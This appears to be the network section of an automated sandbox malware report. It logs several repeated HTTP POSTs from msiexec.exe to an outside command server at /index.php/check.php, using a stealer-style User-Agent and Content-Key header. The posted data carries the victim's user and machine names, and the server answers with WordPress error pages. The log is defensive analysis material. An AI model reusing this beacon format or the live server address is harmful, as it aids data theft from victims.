                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:15.447427988 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:15.447438955 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:15.448391914 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.459086137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:15.525146961 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:15.529973984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:18.171447039 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:16 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:18.171510935 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:18.171516895 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.459087137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:18.329709053 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:18.355470896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:18.605232000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:21.012243986 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:18 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:21.012944937 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                        Oct 2, 2024 07:19:21.012959957 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                        Oct 2, 2024 07:19:21.013755083 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.459088137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:21.246655941 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:21.251872063 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:23.973371029 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:21 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:23.973893881 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:23.973906040 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.459089137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:24.150774956 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:19:24.164841890 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:19:27.547966957 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:24 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:19:27.548192024 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:19:27.548202991 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                        Oct 2, 2024 07:19:27.549618006 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:19:24 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.459090137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:19:27.697428942 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
